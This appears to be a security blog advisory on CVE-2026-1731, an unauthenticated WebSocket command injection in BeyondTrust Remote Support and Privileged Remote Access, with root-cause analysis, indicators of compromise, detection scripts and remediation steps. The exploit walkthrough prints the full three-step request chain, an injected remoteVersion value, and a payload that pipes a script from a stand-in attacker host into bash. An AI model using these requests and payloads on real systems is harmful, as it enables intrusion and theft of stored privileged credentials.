BeyondTrust Pre-Auth RCE (CVE-2026-1731): WebSocket OS Command Injection Hits 8,500+ Vulnerable Instances

Executive Summary

A critical pre-authentication remote code execution vulnerability has been discovered in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) — two widely deployed enterprise remote access platforms. Tracked as CVE-2026-1731 with a CVSS score of 9.9, this flaw requires no credentials, no user interaction, and is exploitable over the network alone. Attackers can achieve full OS-level command execution by injecting shell commands through a WebSocket endpoint before authenticating.

With an estimated 11,000 internet-exposed instances and 8,500+ confirmed vulnerable, CVE-2026-1731 is a mass-exploitation event in progress. A public proof-of-concept (PoC) dropped on February 6, 2026 — hours before in-the-wild exploitation began. Mass exploitation was confirmed by February 12. Post-compromise activity includes SimpleHelp RMM backdoor deployment and credential vault access, enabling lateral movement across enterprise networks.

If your organization runs BeyondTrust RS ≤ 25.3.1 or PRA ≤ 24.3.4 and the management interface is internet-accessible, assume you are at risk right now.

CVSS 9.9 Breakdown

CVE-2026-1731 earns a near-perfect CVSS score through the most dangerous combination of attack vector attributes:

  • Attack Vector (AV:N): Network — fully exploitable over the internet, no physical or local access required
  • Attack Complexity (AC:L): Low — a three-step WebSocket exchange, scriptable in under 50 lines of Python
  • Privileges Required (PR:N): None — zero authentication, zero credentials, no session token needed
  • User Interaction (UI:N): None — fully automated exploitation, no victim interaction
  • Scope (S:C): Changed — arbitrary OS commands run in the context of the BeyondTrust service account, which typically holds elevated privileges on the host
  • Confidentiality (C:H): High — complete access to the credential vault, session recordings, and privileged access keys
  • Integrity (I:H): High — full ability to modify system configuration, implant backdoors, or tamper with access policies
  • Availability (A:H): High — service disruption or complete system takeover possible

The one-tenth deduction from a perfect 10.0 reflects minor environmental factors — in practice, this vulnerability should be treated with the same urgency as a CVSS 10.0. BeyondTrust platforms are privileged access chokepoints: compromising one means compromising everything it touches.

Technical Analysis: The Attack Chain

Root Cause: Unsanitized Parameter in Bash Numeric Comparison

The vulnerability originates in BeyondTrust's remote session negotiation logic. During a WebSocket-based session handshake, the server extracts a remoteVersion parameter from the incoming WebSocket message and passes it to a Bash script performing a numeric version comparison:

if [[ "$remoteVersion" -gt "$localVersion" ]]; then
    # upgrade path
fi

The remoteVersion value is never validated or sanitized before being interpolated into this expression. In Bash, the -gt numeric comparison inside [[ ]] will trigger command substitution if the variable contains backtick or $() syntax. An attacker supplies a value like 1$(curl${IFS}http://attacker.com/shell.sh|bash) and the shell executes the injected payload during comparison evaluation. This is a textbook CWE-78 (Improper Neutralization of Special Elements used in an OS Command) in a server-side context with no authentication gate in front of the WebSocket endpoint.
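The defensive counterpart to this root cause is to refuse anything that is not a plain integer before the value reaches a numeric shell test at all. The snippet below is an added example written for this article, not BeyondTrust's script or the vendor's patch: the function names and the exit-code convention are my own, and the injection-shaped strings it feeds to the validator are constructed samples that are only ever handled as data, never evaluated.

```shell
#!/bin/sh
# Added example, not BeyondTrust's script: validate a client-supplied version
# string before it reaches a numeric shell test. The injection-shaped strings
# used below are constructed samples and are only ever handled as data.

# Return 0 if $1 is a non-empty string of ASCII digits, 1 otherwise.
# Anything carrying $, `, (, ), [, whitespace or letters fails the pattern.
version_is_numeric() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
        *)           return 0 ;;
    esac
}

# "Remote newer than local" check that only compares validated input.
# Exit status: 0 = remote is newer, 1 = remote is not newer, 2 = input rejected.
safe_version_gt() {
    remote_ver=$1
    local_ver=$2
    version_is_numeric "$remote_ver" || return 2
    version_is_numeric "$local_ver"  || return 2
    # Both operands are proven digit strings, so -gt sees a number and nothing else.
    [ "$remote_ver" -gt "$local_ver" ]
}

# Demonstration against a local version of 25 (constructed value).
for candidate in 26 25 '1$(id>/tmp/pwned)' '1`id`' ''; do
    safe_version_gt "$candidate" 25 && rc=0 || rc=$?
    case $rc in
        0) echo "remoteVersion='$candidate': newer than 25, take upgrade path" ;;
        2) echo "remoteVersion='$candidate': rejected before comparison" ;;
        *) echo "remoteVersion='$candidate': not newer than 25" ;;
    esac
done
```

Because the allowlist check runs first, the outcome no longer depends on which test construct ([ or [[) performs the comparison or on what the shell would do with metacharacters inside it; the right place to apply such a check is where remoteVersion is parsed out of the WebSocket message, before it is handed to any script.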

Stage 1: Enumerate the Company Identifier

Exploitation begins with a single unauthenticated HTTP request:

GET /get_portal_info HTTP/1.1
Host: target.beyondtrustcloud.com

The JSON response carries configuration metadata, among it the x-ns-company field, a tenant identifier the WebSocket endpoint uses to route sessions. This value is required for Stage 2 and is disclosed to anyone who asks, with no authentication.

{
  "x-ns-company": "acmecorp",
  "portal_version": "25.2.1",
  ...
}

Stage 2: Establish the Unauthenticated WebSocket Connection

Using the extracted company value, the attacker initiates a WebSocket upgrade to the /nw endpoint:

GET /nw?company=acmecorp HTTP/1.1
Host: target.beyondtrustcloud.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13

The server accepts this connection without requiring any authentication token. The /nw endpoint is intended for the initial phase of remote session negotiation — a phase that was never gated behind authentication, on the assumption that the connection would only come from BeyondTrust client software. This assumption is the design flaw that makes exploitation trivial.

Stage 3: Inject OS Commands via remoteVersion

With the WebSocket open, the attacker sends a crafted session negotiation message:

{
  "type": "session_negotiate",
  "remoteVersion": "1$(id>/tmp/pwned)",
  "clientType": "support_client"
}

The server-side Bash script receives remoteVersion=1$(id>/tmp/pwned), evaluates it inside the numeric comparison, and the command substitution fires — writing the output of id to /tmp/pwned under the BeyondTrust service account. Replace id>/tmp/pwned with a reverse shell, a wget/curl dropper, or a persistence mechanism and you have full pre-auth RCE. Observed payloads in active exploitation include:

  • Download and execute SimpleHelp RMM agent for persistent C2 access
  • Dump the BeyondTrust credential vault database
  • Create rogue local administrator accounts
  • Deploy web shells into the BeyondTrust web root

Why This Works Without Authentication

BeyondTrust's architecture exposes the /nw WebSocket endpoint on the same public-facing HTTPS port as the administrative interface. The design rationale is that support clients need to connect before authenticating via the portal UI. The security boundary was supposed to be enforced downstream in the session setup logic — but the command injection fires in the initial negotiation phase, well before any authentication check is reached. This is a classic security layer ordering failure: dangerous operations (shell execution) occurring before the identity verification step.

Scope and Scale: Who Is Exposed

BeyondTrust Remote Support and Privileged Remote Access are enterprise-grade platforms deployed by Fortune 500 companies, government agencies, financial institutions, and managed service providers. They are commonly deployed in highly privileged positions:

  • IT help desk infrastructure: All inbound support sessions route through RS/PRA instances
  • PAM (Privileged Access Management): PRA is a Gartner-recognized PAM solution, storing passwords and SSH keys for critical infrastructure
  • Jump server replacements: Organizations use RS/PRA as the single gateway for all privileged RDP/SSH access
  • MSP tooling: Managed service providers use RS to access hundreds of customer networks from a single deployment

Exposure Numbers (as of Feb 19, 2026)

  • ~11,000 internet-exposed instances identified via Shodan/Censys
  • 8,500+ confirmed running vulnerable versions (RS ≤ 25.3.1 or PRA ≤ 24.3.4)
  • < 48 hours between PoC publication and confirmed in-the-wild exploitation
  • Feb 12: Mass exploitation wave confirmed by Arctic Wolf, Orca Security, and SentinelOne

Affected Versions

  • BeyondTrust Remote Support (RS): All versions ≤ 25.3.1
  • BeyondTrust Privileged Remote Access (PRA): All versions ≤ 24.3.4
  • Fixed versions: RS 25.3.2+, PRA 25.1.1+ (Advisory BT26-02, released February 6, 2026)

Detection and Indicators of Compromise

If you have not yet patched, hunt for these indicators immediately. If you have patched, hunt for them anyway — mass exploitation began two weeks ago.

Network-Level IoCs

  • WebSocket upgrade requests (GET /nw?company=*) from external IP ranges — especially from scanning infrastructure (Shodan crawlers, GreyNoise mass-scanners, known VPN exits)
  • WebSocket connections to /nw that do not originate from your known support client IP ranges
  • Anomalous outbound connections from the BeyondTrust server process to external IPs on uncommon ports (4444, 8080, 9001 — common reverse shell ports)
  • DNS queries originating from the BeyondTrust host for unknown or newly registered domains
  • Outbound HTTP/S to SimpleHelp update servers or distribution CDNs (SimpleHelp RMM is the observed post-exploitation backdoor)
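To turn the first two network indicators into something you can run over an exported access log, here is an added example, not a BeyondTrust tool or log format: a POSIX shell/awk hunt that flags /get_portal_info and /nw?company= requests from sources outside an allowlist and then lists the IPs that performed both steps of the recon-then-connect sequence. The log lines are constructed in Combined Log Format; ALLOWED_PREFIXES and the field positions are assumptions you adjust to your appliance's actual log layout.

```shell
#!/bin/sh
# Added example, not BeyondTrust's code: hunt an HTTP access log for the
# Stage 1 / Stage 2 pattern (/get_portal_info followed by a /nw?company=
# WebSocket upgrade) from IPs outside known support-client ranges.
# Log lines are constructed; field positions assume Combined Log Format.

SAMPLE_LOG='10.0.5.7 - - [10/Feb/2026:09:12:01 +0000] "GET /get_portal_info HTTP/1.1" 200 512
198.51.100.23 - - [10/Feb/2026:09:12:02 +0000] "GET /get_portal_info HTTP/1.1" 200 512
198.51.100.23 - - [10/Feb/2026:09:12:03 +0000] "GET /nw?company=acmecorp HTTP/1.1" 101 0
10.0.5.7 - - [10/Feb/2026:09:15:44 +0000] "GET /nw?company=acmecorp HTTP/1.1" 101 0
203.0.113.9 - - [10/Feb/2026:09:20:00 +0000] "GET /login HTTP/1.1" 200 2048
192.0.2.77 - - [10/Feb/2026:09:21:10 +0000] "GET /nw?company=acmecorp HTTP/1.1" 101 0'

# Trusted source prefixes (assumption: your corporate / support-client ranges).
ALLOWED_PREFIXES="10. 192.168."

# Print every line requesting one of the two pre-auth endpoints from a source
# IP not covered by ALLOWED_PREFIXES. Reads the log on stdin.
flag_preauth_requests() {
    awk -v allowed="$ALLOWED_PREFIXES" '
    BEGIN { n = split(allowed, pfx, " ") }
    {
        ip = $1
        path = $7      # token after the quoted method: "GET /nw?company=x HTTP/1.1"
        if (path !~ /^\/nw[?]company=/ && path !~ /^\/get_portal_info/) next
        trusted = 0
        for (i = 1; i <= n; i++) if (index(ip, pfx[i]) == 1) trusted = 1
        if (!trusted) print
    }'
}

# Untrusted IPs that hit BOTH endpoints: the reconnaissance-then-connect pattern.
suspect_ips() {
    flag_preauth_requests | awk '
    {
        if ($7 ~ /^\/get_portal_info/) info[$1] = 1
        else if ($7 ~ /^\/nw[?]company=/) nw[$1] = 1
    }
    END { for (ip in info) if (ip in nw) print ip }' | sort
}

echo "== untrusted requests to pre-auth endpoints =="
printf '%s\n' "$SAMPLE_LOG" | flag_preauth_requests
echo "== IPs that performed both steps =="
printf '%s\n' "$SAMPLE_LOG" | suspect_ips
```

On the constructed sample, 192.0.2.77 is flagged for the bare /nw upgrade while 198.51.100.23 is the only source that also fetched /get_portal_info first; the second list is the one worth pivoting on in the process and EDR telemetry described further down, since a client that already knows its tenant identifier has no reason to request it.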

Host-Level IoCs

  • Child processes spawned from the BeyondTrust site/service user (www-data, btss, or equivalent): curl, wget, bash, sh, python — these should never spawn from the BeyondTrust process tree
  • SimpleHelp binaries present in C:\ProgramData\ or /tmp/, /var/tmp/, /dev/shm/
  • New local administrator accounts or SSH authorized_keys modifications post-dating your last known-good configuration
  • Web shell files in the BeyondTrust web root (check for .php, .jsp, .aspx files with recent creation dates)
  • Unusual reads of the BeyondTrust credential vault database files (*.db, *.sqlite)

Log Sources to Examine

  • BeyondTrust access logs: Filter for /nw WebSocket upgrades and /get_portal_info requests from external IPs
  • OS process creation logs (Windows Event ID 4688 / Sysmon Event ID 1): Parent process = BeyondTrust service, child = shell binary
  • EDR telemetry: Command injection payloads often leave forensic artifacts in process command-line arguments even if the attacker attempts to clean up
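The process-lineage check from the host-level IoCs and the log-source list above, as an added example that is neither a BeyondTrust nor a Sysmon tool: a shell/awk hunt over process-creation records that flags shell and downloader binaries started under the appliance's service user and summarises them per parent process. The records are constructed, and the pipe-delimited layout (timestamp|user|parent|child_path|cmdline) is an assumption standing in for whatever your auditd, Sysmon Event 1 or Windows 4688 export looks like once normalised.

```shell
#!/bin/sh
# Added example, not a BeyondTrust or Sysmon tool: hunt process-creation records
# for shell or downloader binaries launched under the BeyondTrust service user.
# Records are constructed; layout is timestamp|user|parent|child_path|cmdline.

SAMPLE_PROCS='2026-02-10T09:12:05Z|btss|beyondtrust-web|/bin/bash|bash -c "id>/tmp/pwned"
2026-02-10T09:12:06Z|btss|beyondtrust-web|/usr/bin/curl|curl -fsSL http://203.0.113.5/x.sh
2026-02-10T09:13:00Z|btss|beyondtrust-web|/usr/bin/openssl|openssl x509 -in cert.pem -noout
2026-02-10T09:14:00Z|root|systemd|/usr/bin/bash|bash /usr/local/sbin/backup.sh
2026-02-10T09:15:00Z|btss|beyondtrust-web|/usr/bin/python3|python3 -c "print(1)"
2026-02-10T09:16:00Z|www-data|nginx|/usr/bin/wget|wget -q http://203.0.113.5/a'

# Service accounts the appliance runs under (the article names www-data and btss).
SERVICE_USERS="btss www-data"
# Child binaries that should never appear under those users (from the host IoC list).
SHELL_BINS="bash sh curl wget python python3"

# Print records where a service user spawned one of the listed binaries.
flag_suspicious_children() {
    awk -F'|' -v users="$SERVICE_USERS" -v bins="$SHELL_BINS" '
    BEGIN {
        nu = split(users, u, " "); for (i = 1; i <= nu; i++) svc[u[i]] = 1
        nb = split(bins,  b, " "); for (i = 1; i <= nb; i++) bad[b[i]] = 1
    }
    {
        user = $2; child = $4
        sub(/.*\//, "", child)        # reduce /usr/bin/curl to curl
        if ((user in svc) && (child in bad)) print
    }'
}

# Count flagged spawns per parent process: the pivot you would take into EDR.
count_by_parent() {
    flag_suspicious_children | awk -F'|' '{ n[$3]++ } END { for (p in n) print p, n[p] }' | sort
}

echo "== suspicious child processes =="
printf '%s\n' "$SAMPLE_PROCS" | flag_suspicious_children
echo "== flagged spawns per parent =="
printf '%s\n' "$SAMPLE_PROCS" | count_by_parent
```

The openssl child and root's backup script pass because the rule keys on both the user and the child binary; the command-line column is kept in the output on purpose, since, as the EDR bullet notes, it is where the injected payload tends to survive even after cleanup.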

Testing Your Own Instance

For authorized security testing of your BeyondTrust deployment, Burp Suite Professional is the standard tool for intercepting WebSocket frames, replaying modified messages, and validating whether your patched instance correctly rejects injected remoteVersion values. Use Burp's WebSocket history and Repeater to craft test payloads against a controlled lab instance before verifying your production fix. The Active Scan extension can automate detection of command injection patterns in WebSocket message parameters.

Remediation: Patch, Restrict, Detect

Priority 1: Patch Immediately (Critical)

Apply BeyondTrust Advisory BT26-02:

  • Remote Support: Upgrade to RS 25.3.2 or later
  • Privileged Remote Access: Upgrade to PRA 25.1.1 or later

BeyondTrust cloud-hosted instances (BeyondTrust.com SaaS) were patched automatically on February 6, 2026. Self-hosted deployments require manual upgrade. Verify your patch status in the BeyondTrust appliance admin console under Management → Software → Version.

Priority 2: Network-Level Mitigations (If Immediate Patching Is Not Possible)

  • IP allowlist: Restrict access to the BeyondTrust management interface to known corporate IP ranges via perimeter firewall or the appliance's built-in IP restriction feature. The /nw endpoint must not be reachable from arbitrary internet IPs.
  • VPN gate: Place the BeyondTrust instance behind a VPN concentrator and require VPN authentication before any connection reaches the appliance
  • WAF rule: Deploy a Web Application Firewall rule to block WebSocket upgrade requests to /nw from unauthenticated external sources. AWS WAF, Cloudflare WAF, and F5 BIG-IP all support WebSocket protocol inspection. Block or challenge requests matching: GET /nw?company=* from non-allowlisted sources.

Priority 3: Assume-Breach Response

Given that mass exploitation began February 12 and many organizations have not yet patched, treat any unpatched (or recently patched but unaudited) instance as potentially compromised:

  1. Rotate all credentials stored in the BeyondTrust vault — SSH keys, RDP passwords, API keys
  2. Revoke and reissue all active BeyondTrust sessions
  3. Hunt for SimpleHelp RMM deployments across systems the BeyondTrust service account had access to
  4. Review Windows Event 4688 / Sysmon Event 1 logs on the BeyondTrust host for the February 6–19 window
  5. Engage your IR team or a managed detection and response (MDR) provider for forensic triage if suspicious indicators are found

Long-Term Hardening

  • Never expose BeyondTrust administrative interfaces directly to the internet without VPN or zero-trust network access (ZTNA)
  • Implement least-privilege service accounts for BeyondTrust processes — limit the OS commands available to the service user
  • Enable BeyondTrust's audit logging to SIEM for real-time alerting on anomalous WebSocket patterns
  • Subscribe to BeyondTrust security advisories and establish a patching SLA for CVSS ≥ 9.0: patch within 24-48 hours

Post-Exploitation: What Attackers Do Next

Observed and anticipated post-exploitation activity following CVE-2026-1731 exploitation:

SimpleHelp RMM Backdoor

The primary persistence mechanism observed in the wild is the deployment of SimpleHelp, a legitimate remote monitoring and management (RMM) tool. Attackers abuse legitimate RMM software because it blends into enterprise environments, bypasses many EDR behavioral rules, and provides persistent, encrypted C2 channels without requiring custom malware. Look for SimpleHelp.exe, simplehelp.jar, or installation directories under C:\ProgramData\SimpleHelp\.

Credential Vault Pillaging

BeyondTrust PRA's primary value proposition — and the attacker's primary target — is its credential vault. Post-exploitation, attackers extract stored credentials enabling:

  • Direct RDP/SSH access to all managed endpoints without triggering BeyondTrust session controls
  • Lateral movement to critical infrastructure: domain controllers, core switches, hypervisors
  • Privilege escalation via stored domain administrator credentials
  • Exfiltration of secrets before the organization detects the breach and rotates credentials

BeyondTrust is a PAM solution — if the PAM is compromised, the attacker effectively has the keys to your entire privileged infrastructure.

Persistence via Web Shell and Rogue Accounts

Secondary persistence mechanisms observed include web shell deployment and creation of rogue local or domain accounts with BeyondTrust administrative privileges, ensuring continued access even if the original WebSocket injection vector is patched.

Essential Resources for Bug Hunters and Security Researchers

CVE-2026-1731 is a masterclass in several core vulnerability classes that every bug bounty hunter should deeply understand: WebSocket security, OS command injection, and pre-authentication attack surfaces. These resources will sharpen your ability to find — and responsibly disclose — similar issues:

  • Burp Suite Professional — The industry-standard web application security testing platform. For this vulnerability class specifically, Burp's WebSocket Repeater, Active Scan, and custom insertion point features are invaluable for probing command injection in WebSocket parameters. Essential for any researcher targeting enterprise remote access products.
  • The Web Application Hacker's Handbook (2nd Edition) — The definitive reference for web vulnerability research. Covers OS command injection (CWE-78), WebSocket security testing, authentication bypass, and the full spectrum of server-side attack techniques that underpin CVE-2026-1731. Required reading for anyone pursuing critical-severity web vulnerabilities.
  • The Hardware Hacking Handbook — When software vulnerabilities like CVE-2026-1731 give you OS-level access to appliance-based products (BeyondTrust RS runs on physical or virtual appliances), hardware hacking skills become directly relevant. Covers firmware extraction, UART/JTAG debugging, and appliance reverse engineering — critical skills for full-depth vulnerability research on remote access appliances.
  • The Hacker Playbook 3 — Practical red team methodologies covering lateral movement, credential theft from PAM solutions, and persistence via RMM tools — exactly the post-exploitation chain observed in CVE-2026-1731 wild exploitation.

Disclosure and Exploitation Timeline

  • February 6, 2026: BeyondTrust publishes Advisory BT26-02 and releases RS 25.3.2 / PRA 25.1.1 patches
  • February 6, 2026: Public proof-of-concept exploit published within hours of advisory release
  • February 6–7, 2026: First in-the-wild exploitation detected — SimpleHelp RMM backdoor deployments reported by Arctic Wolf and Orca Security
  • February 12, 2026: Mass exploitation wave confirmed; SentinelOne and SecurityAffairs report widespread automated scanning and exploitation
  • February 19, 2026: 8,500+ vulnerable instances remain unpatched; exploitation ongoing

The speed of exploitation — PoC to active mass-exploitation in under a week — reflects the extreme value of BeyondTrust targets and the ease of exploitation (three HTTP/WebSocket steps, no authentication). Organizations that have not patched by now have almost certainly already been scanned; many have been compromised.

Bug Bounty Perspective: What to Look For

CVE-2026-1731 illustrates a repeatable vulnerability pattern in enterprise remote access products. If you're hunting in this space, focus on:

  • Pre-authentication WebSocket endpoints: Enumerate all WebSocket upgrade paths before authentication gates. Test every parameter for command injection, SSRF, and deserialization using Burp's WebSocket tooling.
  • Version negotiation protocols: Any server-side logic that compares client-supplied version strings against Bash numeric operators is a prime injection target. Look for shell scripts that process user-supplied values.
  • Configuration discovery endpoints: /get_portal_info-style endpoints that disclose tenant identifiers, version strings, or internal paths often form the reconnaissance phase of a multi-step exploit chain.
  • Appliance-based products: Remote access appliances (BeyondTrust, Pulse Secure, Citrix Gateway, Fortinet) have historically high densities of pre-auth RCE vulnerabilities. Their complexity, long patch cycles, and privileged network positions make them extremely high-value targets for both attackers and bug bounty hunters.

For deep-dive research into remote access appliance internals, The Hardware Hacking Handbook provides the firmware extraction and embedded Linux analysis techniques needed to audit these systems at the binary level — often revealing vulnerabilities that black-box testing misses.

Conclusion: A Textbook PAM Nightmare

CVE-2026-1731 is a textbook example of why privileged access management platforms are among the highest-value targets in enterprise security. A single pre-authentication flaw in a WebSocket parameter handler gives attackers OS-level code execution on a platform that holds the keys to your entire privileged infrastructure — domain admin credentials, SSH keys, RDP passwords for every managed endpoint.

The exploitation timeline is unforgiving: PoC on February 6, mass exploitation by February 12, and over 8,500 vulnerable instances still exposed as of today. This is not a theoretical risk — it is an active, ongoing compromise event for organizations that have not acted.

Immediate Action Checklist:

  1. ✅ Patch RS to 25.3.2+ or PRA to 25.1.1+ today — no exceptions
  2. ✅ If patching is impossible right now: restrict /nw WebSocket access via WAF or IP allowlist immediately
  3. ✅ Hunt for SimpleHelp binaries and unexpected child processes from the BeyondTrust service account
  4. ✅ Rotate all credentials stored in the BeyondTrust vault — treat them as compromised
  5. ✅ Review process creation logs (Windows Event 4688 / Sysmon Event 1) for the February 6–19 window
  6. ✅ Never expose BeyondTrust administrative interfaces directly to the internet — VPN or ZTNA only

For security researchers: CVE-2026-1731 is a reminder that the most critical vulnerabilities are often simple. Three HTTP/WebSocket steps, one unsanitized variable, and an architecture that trusted its own negotiation endpoints — that's all it takes to compromise 8,500+ enterprise environments. The complexity isn't in the exploit; it's in finding that one unsanitized parameter in a sea of enterprise software.
